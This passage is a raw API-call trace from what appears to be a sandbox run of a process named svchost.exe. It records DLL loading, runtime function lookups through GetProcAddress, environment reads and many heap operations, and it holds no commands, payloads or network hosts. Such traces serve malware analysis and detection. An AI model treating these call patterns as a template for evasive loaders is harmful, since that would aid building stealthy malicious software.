!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0xcf7c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0176.938] RtlInitializeSListHead (in: ListHead=0x1800b6750 | out: ListHead=0x1800b6750) [0176.938] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1000) returned 0x60b850 [0176.943] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1800b6920, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x30) returned 0x6053c0 [0176.943] GetEnvironmentStringsW () returned 0x60c860* [0176.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4e6) returned 0x60d240 [0176.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x60d240, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0176.943] FreeEnvironmentStringsW (penv=0x60c860) returned 1 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x118) returned 0x60c860 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1f) returned 0x615220 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2e) returned 0x605400 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x31) returned 0x605660 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3c) returned 0x6056b0 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x31) returned 0x605700 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x14) returned 0x615200 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x24) returned 0x605440 [0176.943] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xd) returned 0x6057b0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1d) returned 0x615400 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x31) returned 0x6057d0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x15) returned 0x615100 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x17) returned 0x6151c0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe) returned 0x605820 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x69) returned 0x60c990 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3e) returned 0x605840 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1d) returned 0x6153a0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x48) returned 0x6140f0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x6152e0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x18) returned 0x615240 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1b) returned 0x615280 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1e) returned 0x615120 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x29) returned 0x60ca10 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1e) returned 0x615140 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x6b) returned 0x60ca50 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x17) returned 0x615260 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xf) returned 0x60cad0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x16) returned 0x615320 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2a) returned 0x60caf0 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x29) returned 0x60cb30 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x615160 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x21) returned 0x613260 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x16) returned 0x615180 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x22) returned 0x613080 [0176.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x6152a0 [0176.944] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60d240 | out: hHeap=0x5f0000) returned 1 [0176.950] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x7ffb26230000 [0176.953] GetProcessHeap () returned 0x5f0000 [0176.953] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x60cb70 [0176.953] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x7ffb28b00000 [0176.953] GetProcessHeap () returned 0x5f0000 [0176.953] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0176.953] lstrlenA (lpString="Advapi32.dll") returned 12 [0176.953] GetProcessHeap () returned 0x5f0000 [0176.953] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x60cb70 [0176.953] lstrcpyA (in: lpString1=0x60cb70, lpString2="Advapi32.dll" | out: lpString1="Advapi32.dll") returned="Advapi32.dll" [0176.953] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffb28a50000 [0176.958] GetProcessHeap () returned 0x5f0000 [0176.958] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0176.958] GetProcessHeap () returned 0x5f0000 [0176.958] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x60cb70 [0176.958] LoadLibraryA (lpLibFileName="WtsApi32.dll") returned 0x7ffb23860000 [0176.960] GetProcessHeap () returned 0x5f0000 [0176.960] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0176.960] lstrlenA (lpString="User32.dll") returned 10 [0176.960] GetProcessHeap () returned 0x5f0000 [0176.960] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x60cb70 [0176.961] lstrcpyA (in: lpString1=0x60cb70, lpString2="User32.dll" | out: lpString1="User32.dll") returned="User32.dll" [0176.961] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffb26090000 [0176.991] GetProcessHeap () returned 0x5f0000 [0176.991] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0176.991] GetProcessHeap () returned 0x5f0000 [0176.992] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x60cb70 [0176.992] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffb267e0000 [0177.042] GetProcessHeap () returned 0x5f0000 [0177.042] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.042] lstrlenA (lpString="ShlwApi.dll") returned 11 [0177.042] GetProcessHeap () returned 0x5f0000 [0177.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x60cb70 [0177.042] lstrcpyA (in: lpString1=0x60cb70, lpString2="ShlwApi.dll" | out: lpString1="ShlwApi.dll") returned="ShlwApi.dll" [0177.042] LoadLibraryA (lpLibFileName="ShlwApi.dll") returned 0x7ffb262e0000 [0177.042] GetProcessHeap () returned 0x5f0000 [0177.042] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.042] GetProcessHeap () returned 0x5f0000 [0177.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x60cb70 [0177.042] LoadLibraryA (lpLibFileName="WinInet.dll") returned 0x7ffb19d70000 [0177.607] GetProcessHeap () returned 0x5f0000 [0177.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.607] GetProcessHeap () returned 0x5f0000 [0177.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x60cb70 [0177.607] LoadLibraryA (lpLibFileName="SetupApi.dll") returned 0x7ffb284c0000 [0177.612] GetProcessHeap () returned 0x5f0000 [0177.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.615] GetProcessHeap () returned 0x5f0000 [0177.615] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x60cb70 [0177.615] LoadLibraryA (lpLibFileName="ImageHlp.dll") returned 0x7ffb26760000 [0177.790] GetProcessHeap () returned 0x5f0000 [0177.790] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.790] GetProcessHeap () returned 0x5f0000 [0177.790] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x60cb70 [0177.790] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffb253c0000 [0177.800] GetProcessHeap () returned 0x5f0000 [0177.800] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.800] GetProcessHeap () returned 0x5f0000 [0177.800] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x60cb70 [0177.800] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffb24fb0000 [0177.806] GetProcessHeap () returned 0x5f0000 [0177.806] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.806] lstrlenA (lpString="Userenv.dll") returned 11 [0177.806] GetProcessHeap () returned 0x5f0000 [0177.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x60cb70 [0177.806] lstrcpyA (in: lpString1=0x60cb70, lpString2="Userenv.dll" | out: lpString1="Userenv.dll") returned="Userenv.dll" [0177.806] LoadLibraryA (lpLibFileName="Userenv.dll") returned 0x7ffb24880000 [0177.810] GetProcessHeap () returned 0x5f0000 [0177.810] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.810] GetProcessHeap () returned 0x5f0000 [0177.810] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x60cb70 [0177.810] LoadLibraryA (lpLibFileName="Oleaut32.dll") returned 0x7ffb288f0000 [0177.818] GetProcessHeap () returned 0x5f0000 [0177.818] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.818] GetProcessHeap () returned 0x5f0000 [0177.818] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x60cb70 [0177.818] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffb253a0000 [0177.820] GetProcessHeap () returned 0x5f0000 [0177.820] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60cb70 | out: hHeap=0x5f0000) returned 1 [0177.830] GetProcessHeap () returned 0x5f0000 [0177.830] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa6) returned 0x60d350 [0177.832] GetProcessHeap () returned 0x5f0000 [0177.832] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x60cb70 [0177.832] GetProcessHeap () returned 0x5f0000 [0177.832] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x60d410 [0177.832] lstrlenA (lpString=", ") returned 2 [0177.832] GetProcessHeap () returned 0x5f0000 [0177.832] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61c0b0 [0177.832] lstrcpyA (in: lpString1=0x61c0b0, lpString2=", " | out: lpString1=", ") returned=", " [0177.832] GetProcessHeap () returned 0x5f0000 [0177.833] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61c1b0 [0177.833] GetProcessHeap () returned 0x5f0000 [0177.833] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61c270 [0177.835] GetProcessHeap () returned 0x5f0000 [0177.835] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61c1f0 [0177.835] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0177.835] GetProcessHeap () returned 0x5f0000 [0177.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c1f0 | out: hHeap=0x5f0000) returned 1 [0177.835] GetProcessHeap () returned 0x5f0000 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61c0d0 [0177.836] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c0d0 | out: hHeap=0x5f0000) returned 1 [0177.836] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61c270, Size=0x5) returned 0x61c080 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61c1b0, Size=0xa6) returned 0x60d030 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61c230 [0177.836] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c230 | out: hHeap=0x5f0000) returned 1 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61c160 [0177.836] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c160 | out: hHeap=0x5f0000) returned 1 [0177.836] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61c080, Size=0x9) returned 0x61c090 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61c1b0 [0177.836] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c1b0 | out: hHeap=0x5f0000) returned 1 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] GetProcessHeap () returned 0x5f0000 [0177.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61c230 [0177.837] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c230 | out: hHeap=0x5f0000) returned 1 [0177.837] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61c090, Size=0x11) returned 0x6153c0 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61c0c0 [0177.837] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c0c0 | out: hHeap=0x5f0000) returned 1 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61c080 [0177.837] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c080 | out: hHeap=0x5f0000) returned 1 [0177.837] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6153c0, Size=0x21) returned 0x613500 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61c0c0 [0177.837] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c0c0 | out: hHeap=0x5f0000) returned 1 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] GetProcessHeap () returned 0x5f0000 [0177.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61c250 [0177.837] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0177.841] GetProcessHeap () returned 0x5f0000 [0177.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c250 | out: hHeap=0x5f0000) returned 1 [0177.842] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613500, Size=0x41) returned 0x614fa0 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61c0e0 [0177.842] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c0e0 | out: hHeap=0x5f0000) returned 1 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61c1b0 [0177.842] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c1b0 | out: hHeap=0x5f0000) returned 1 [0177.842] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x614fa0, Size=0x81) returned 0x61fb80 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61c1e0 [0177.842] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c1e0 | out: hHeap=0x5f0000) returned 1 [0177.842] GetProcessHeap () returned 0x5f0000 [0177.843] GetProcessHeap () returned 0x5f0000 [0177.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61c170 [0177.843] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0177.843] GetProcessHeap () returned 0x5f0000 [0177.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c170 | out: hHeap=0x5f0000) returned 1 [0177.843] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61fb80, Size=0x51) returned 0x6180b0 [0177.843] GetProcessHeap () returned 0x5f0000 [0177.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c0b0 | out: hHeap=0x5f0000) returned 1 [0177.843] GetProcessHeap () returned 0x5f0000 [0177.843] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x60cb70, Size=0xa6) returned 0x60d0f0 [0177.843] GetProcessHeap () returned 0x5f0000 [0177.843] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x60d410, Size=0x51) returned 0x618650 [0177.843] GetProcessHeap () returned 0x5f0000 [0177.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6180b0 | out: hHeap=0x5f0000) returned 1 [0177.843] GetProcessHeap () returned 0x5f0000 [0177.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60d030 | out: hHeap=0x5f0000) returned 1 [0177.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100) returned 0x61b640 [0177.846] GetProcessHeap () returned 0x5f0000 [0177.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f200 [0177.846] GetProcessHeap () returned 0x5f0000 [0177.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f180 [0177.846] GetProcessHeap () returned 0x5f0000 [0177.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f250 [0177.849] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffb26230000 [0177.849] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0177.849] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0177.849] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryA") returned 0x7ffb262574d0 [0177.849] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibrary") returned 0x7ffb26254810 [0177.849] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffb28a50000 [0177.849] GetProcessHeap () returned 0x5f0000 [0177.849] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x41) returned 0x614aa0 [0177.849] GetProcessHeap () returned 0x5f0000 [0177.849] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f260 [0177.849] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x6130b0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x6131a0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x6134a0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x6131d0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f1e0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f190 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f0f0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f0a0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f1a0 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x614c30 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f150 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f270 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f080 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f0b0 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f240 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] HeapFree (in: 